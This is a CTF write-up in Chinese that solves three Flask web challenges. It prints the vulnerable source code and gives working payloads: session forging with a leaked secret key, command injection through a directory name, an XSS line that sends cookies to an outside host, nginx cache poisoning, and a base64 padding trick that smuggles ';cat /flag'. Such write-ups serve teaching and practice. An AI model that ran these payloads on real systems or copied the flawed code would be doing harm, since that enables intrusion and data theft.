online_unzipper

app.py:

import os
import uuid
from flask import Flask, request, redirect, url_for,send_file,render_template, session, send_from_directory, abort, Response

app = Flask(__name__)
app.secret_key = os.environ.get("FLASK_SECRET_KEY", "test_key")
UPLOAD_FOLDER = os.path.join(os.getcwd(), "uploads")
os.makedirs(UPLOAD_FOLDER, exist_ok=True)

users = {}

@app.route("/")
def index():
    if "username" not in session:
        return redirect(url_for("login"))
    return redirect(url_for("upload"))

@app.route("/register", methods=["GET", "POST"])
def register():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]

        if username in users:
            return "用户名已存在"

        users[username] = {"password": password, "role": "user"}
        return redirect(url_for("login"))

    return render_template("register.html")

@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]

        if username in users and users[username]["password"] == password:
            session["username"] = username
            session["role"] = users[username]["role"]
            return redirect(url_for("upload"))
        else:
            return "用户名或密码错误"

    return render_template("login.html")

@app.route("/logout")
def logout():
    session.clear()
    return redirect(url_for("login"))

@app.route("/upload", methods=["GET", "POST"])
def upload():
    if "username" not in session:
        return redirect(url_for("login"))

    if request.method == "POST":
        file = request.files["file"]
        if not file:
            return "未选择文件"

        role = session["role"]

        if role == "admin":
            dirname = request.form.get("dirname") or str(uuid.uuid4())
        else:
            dirname = str(uuid.uuid4())

        target_dir = os.path.join(UPLOAD_FOLDER, dirname)
        os.makedirs(target_dir, exist_ok=True)

        zip_path = os.path.join(target_dir, "upload.zip")
        file.save(zip_path)

        try:
            os.system(f"unzip -o {zip_path} -d {target_dir}")
        except:
            return "解压失败,请检查文件格式"

        os.remove(zip_path)
        return f"解压完成!<br>下载地址: <a href='{url_for('download', folder=dirname)}'>{request.host_url}download/{dirname}</a>"

    return render_template("upload.html")

@app.route("/download/<folder>")
def download(folder):
    target_dir = os.path.join(UPLOAD_FOLDER, folder)
    if not os.path.exists(target_dir):
        abort(404)

    files = os.listdir(target_dir)
    return render_template("download.html", folder=folder, files=files)

@app.route("/download/<folder>/<filename>")
def download_file(folder, filename):
    file_path = os.path.join(UPLOAD_FOLDER, folder ,filename)
    try:
        with open(file_path, 'r') as file:
            content = file.read()
        return Response(
            content,
            mimetype="application/octet-stream",
            headers={
                "Content-Disposition": f"attachment; filename={filename}"
            }
        )
    except FileNotFoundError:
        return "File not found", 404
    except Exception as e:
        return f"Error: {str(e)}", 500


if __name__ == "__main__":
    app.run(host="0.0.0.0")

注意到role为admin时,dirname可控,可以实现命令拼接rce,伪造flask-session需要先获取app.secret_key,本题是从环境变量导入的,可以利用软链接获取/proc/self/environ的内容:

FLASK_SECRET_KEY=#mu0cw9F#7bBCoF!

伪造session:

python flask_session_cookie_manager3.py encode -s "#mu0cw9F#7bBCoF!" -t "{'role':'admin','username':'test'}"

session=eyJyb2xlIjoiYWRtaW4iLCJ1c2VybmFtZSI6InRlc3QifQ.aMUi5w.3kOIwdwel1L_sAQZ2loEgjfRIUA

dirname可控实现rce:

dirname=1;cat /flag*.txt > /app/uploads/c048ac00-3ec7-4557-b328-00e50c5ec392/flag.txt

Unfinished

app.py:

from flask import Flask, request, render_template, redirect, url_for, flash, render_template_string, make_response
from flask_login import LoginManager, UserMixin, login_user, logout_user, current_user, login_required
import requests
from markupsafe import escape
from playwright.sync_api import sync_playwright
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = 'your-secret-key-here'

login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'

class User(UserMixin):
    def __init__(self, id, username, password, bio=""):
        self.id = id
        self.username = username
        self.password = password
        self.bio = bio
admin_password = os.urandom(12).hex()

USERS_DB = {'admin': User(id=1, username='admin', password=admin_password)}
USER_ID_COUNTER = 1

@login_manager.user_loader
def load_user(user_id):
    for user in USERS_DB.values():
        if str(user.id) == user_id:
            return user
    return None

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/register', methods=['GET', 'POST'])
def register():
    global USER_ID_COUNTER
    if request.method == 'POST':
        username = request.form['username']
        if username in USERS_DB:
            flash('Username already exists.')
            return redirect(url_for('register'))
        
        USER_ID_COUNTER += 1
        new_user = User(
            id=USER_ID_COUNTER,
            username=username,
            password=request.form['password']
        )
        USERS_DB[username] = new_user
        login_user(new_user)
        response = make_response(redirect(url_for('index')))
        response.set_cookie('ticket', 'your_ticket_value')
        return response
    return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        user = USERS_DB.get(username)
        if user and user.password == password:
            login_user(user)
            return redirect(url_for('index'))
        flash('Invalid credentials.')
    return render_template('login.html')

@app.route('/logout')
@login_required
def logout():
    logout_user()
    return redirect(url_for('index'))

@app.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
    if request.method == 'POST':
        current_user.bio = request.form['bio']
        print(current_user.bio)
        return redirect(url_for('index'))
    return render_template('profile.html')

@app.route('/ticket', methods=['GET', 'POST'])
def ticket():
    if request.method == 'POST':
        ticket = request.form['ticket']
        response = make_response(redirect(url_for('index')))
        response.set_cookie('ticket', ticket)
        return response
    return render_template('ticket.html')

@app.route("/view", methods=["GET"])
@login_required
def view_user():
    """
    # I found a bug in it.
    # Until I fix it, I've banned /api/bio/. Have fun :)
    """
    username = request.args.get("username",default=current_user.username)
    visit_url(f"http://localhost/api/bio/{username}")
    template = f"""
    {{\% extends "base.html" \%}}
    {{\% block title \%}}success{{\% endblock \%}}
    {{\% block content \%}}
    <h1>bot will visit your bio</h1>
    <p style="margin-top: 1.5rem;"><a href="{{ url_for('index') }}">Back to Home</a></p>
    {{\% endblock \%}}
    """
    return render_template_string(template)


@app.route("/api/bio/<string:username>", methods=["GET"])
@login_required
def get_user_bio(username):
    if not current_user.username == username:
        return "Unauthorized", 401
    user = USERS_DB.get(username)
    if not user:
        return "User not found.", 404
    return user.bio

def visit_url(url):
    try:
        flag_value = os.environ.get('FLAG', 'flag{fake}')

        with sync_playwright() as p:
            browser = p.chromium.launch(headless=True, args=["--no-sandbox"])
            context = browser.new_context()

            context.add_cookies([{
                'name': 'flag',
                'value': flag_value,
                'domain': 'localhost',
                'path': '/',
                'httponly': True
            }])

            page = context.new_page()
            page.goto("http://localhost/login", timeout=5000)
            page.fill("input[name='username']", "admin")
            page.fill("input[name='password']", admin_password)
            page.click("input[name='submit']")
            page.wait_for_timeout(3000)
            page.goto(url, timeout=5000)
            page.wait_for_timeout(5000)
            browser.close()

    except Exception as e:
        print(f"Bot error: {str(e)}")


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

实现了一个常规的注册登录修改个人信息的功能,个人信息中可以修改两条内容,一个是ticket,另一个是bio,同时提供了bot访问指定用户bio的功能,第一时间想到XSS带出Cookie,将bio改为XSS语句:

<script>fetch('http://ip:port/steal?flag='+document.cookie)</script>

想要实现XSS还需要解决两个问题,第一个问题/api/bio/<string:username>路由要求只能自己访问自己的bio,第二个问题bot设置Cookie的httpOnly属性为True,正常情况下是无法通过javascript脚本来获取Cookie的

nginx.conf:

user  www-data;
worker_processes  auto;
pid        /var/run/nginx.pid;

events {
    worker_connections  1024;
}

http {
    proxy_cache_path /var/cache/nginx levels=1:2 keys_zone=static_cache:10m max_size=1g inactive=60m;

    include       /etc/nginx/mime.types;
    default_type  application/octet-stream;

    server {
        listen 80 default_server;
        server_name _;

        location / {
            proxy_pass http://127.0.0.1:5000;
        }

        location /api/bio/ {
            return 403;
        }

        location ~ \.(css|js)$ {
            proxy_pass http://127.0.0.1:5000;
            proxy_ignore_headers Vary;
            proxy_cache static_cache;
            proxy_cache_valid 200 10m;
        }
    }
}

对于第一个问题,在nginx.conf中甚至直接ban了/api/bio/,但是这里有个nginx的配置问题,正则匹配优先级是高于普通前缀匹配的,因此只要设置用户名为.js/.css后缀,这样就能实现访问自己的bio

要想让bot访问恶意用户的bio,还需要利用到nginx中设置的cache,本题是10min的缓存,并且没有明确设置缓存键proxy_cache_key,使用默认缓存键,例如:

$scheme:GET
$proxy_host:example.com
$request_uri:/index.html

通过缓存投毒来绕过current_user.username == username的判断,这样bot就能访问恶意用户的bio,从而解决第一个问题

对于第二个问题,app.py中设置的是httponly,但是正确的设置应该是httpOnly,因此并没有起到预防XSS窃取Cookie的作用

大致的攻击流程:创建.js/.css后缀用户名 -> 设置bio为XSS -> 自己访问恶意bio实现缓存投毒 -> bot访问恶意bio实现XSS窃取Cookie,攻击效果:

alt

参考资料:

https://www.echo.cool/docs/middleware/nginx/nginx-caching-mechanism/nginx-cache-key/

https://playwright.net.cn/python/docs/api/class-browsercontext


ping

app.py:

import base64
import subprocess
import re
import ipaddress
import flask

def run_ping(ip_base64):
    try:
        decoded_ip = base64.b64decode(ip_base64).decode('utf-8')
        if not re.match(r'^\d+\.\d+\.\d+\.\d+$', decoded_ip):
            return False
        if decoded_ip.count('.') != 3:
            return False
        if not all(0 <= int(part) < 256 for part in decoded_ip.split('.')):
            return False
        if not ipaddress.ip_address(decoded_ip):
            return False
        if len(decoded_ip) > 15:
            return False
        if not re.match(r'^[A-Za-z0-9+/=]+$', ip_base64):
            return False
    except Exception as e:
        return False
    command = f"""echo "ping -c 1 $(echo '{ip_base64}' | base64 -d)" | sh"""

    try:
        process = subprocess.run(
            command,
            shell=True,
            check=True,
            capture_output=True,
            text=True
        )
        return process.stdout
    except Exception as e:
        return False

app = flask.Flask(__name__)

@app.route('/ping', methods=['POST'])
def ping():
    data = flask.request.json
    ip_base64 = data.get('ip_base64')
    if not ip_base64:
        return flask.jsonify({'error': 'no ip'}), 400

    result = run_ping(ip_base64)
    if result:
        return flask.jsonify({'success': True, 'output': result}), 200
    else:
        return flask.jsonify({'success': False}), 400

@app.route('/')
def index():
    return flask.render_template('index.html')

app.run(host='0.0.0.0', port=5000)

实现了ping ip的功能,同时对于python base64解码后的ip有严格的过滤,但是在执行命令时用的是linux的base64实现的解码,二者的实现是有差异的,python不会解析填充符=之后的内容:

import base64

s1 = b"dGVzdA=="
s2 = b"dGVzdA==Y29tbWFuZA=="

print(base64.b64decode(s1)) # b'test'
print(base64.b64decode(s2)) # b'test'
$ echo 'dGVzdA==' | base64 -d
test

$ echo 'dGVzdA==Y29tbWFuZA==' | base64 -d
testcommand

只需要构造一个base64编码后有填充符的ip,后面跟上base64编码的命令就能实现rce:

$ echo -n '8.8.8.8' | base64 | tr -d '\n'; echo -n ';cat /flag' | base64
OC44LjguOA==O2NhdCAvZmxhZw==

payload:

{"ip_base64":"OC44LjguOA==O2NhdCAvZmxhZw=="}

response:

{"output":"PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=128 time=66.5 ms\n\n--- 8.8.8.8 ping statistics ---\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\nrtt min/avg/max/mdev = 66.546/66.546/66.546/0.000 ms\nflag{test}\n","success":true}